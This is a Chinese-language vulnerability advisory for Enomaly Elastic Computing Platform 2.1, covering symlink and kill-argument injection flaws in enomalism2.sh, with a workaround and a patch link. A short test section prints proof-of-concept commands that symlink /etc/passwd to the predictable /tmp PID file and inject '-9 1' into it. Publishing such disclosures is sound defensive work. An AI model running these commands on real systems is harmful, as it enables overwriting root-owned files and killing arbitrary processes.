发布日期：2009-01-30
更新日期：2009-02-17

受影响系统：

Enomaly Elastic Computing Platform 2.1

不受影响系统：

Enomaly Elastic Computing Platform 2.1.1

描述：

---

BUGTRAQ  ID: 33544
CVE(CAN) ID: CVE-2008-4990,CVE-2009-0390

Enomaly ECP（之前名为Enomalism）是用于管理虚拟机的软件。

ECP的enomalism2.sh中存在多个安全漏洞，本地攻击者可以通过符号链接攻击以root用户权限覆盖任意系统文件、向kill命令注入参数以终止任意进程或向进程发送信号，或导致虚拟机无法启动。

<*来源：Sam Johnston （samj@samj.net）
  
  链接：http://secunia.com/advisories/33724
        http://marc.info/?l=bugtraq&m=123480557513909&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

a. while true; do ln -s /etc/passwd /tmp/enomalism2.pid; done
b. echo "-9 1" > /tmp/enomalism2.pid
c. i. ln -s /tmp/root /tmp/enomalism2.pid
  ii. chgrp beetroot /tmp/enomalism2.pid

建议：

---

临时解决方法：

* 将PIDFILE从/tmp/enomalism2.pid更改为/var/run/enomalism2.pid。

厂商补丁：

Enomaly
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://sourceforge.net/project/showfiles.php?group_id=164855&package_id=186866&release_id=660061

浏览次数：2413
严重程度：0（网友投票）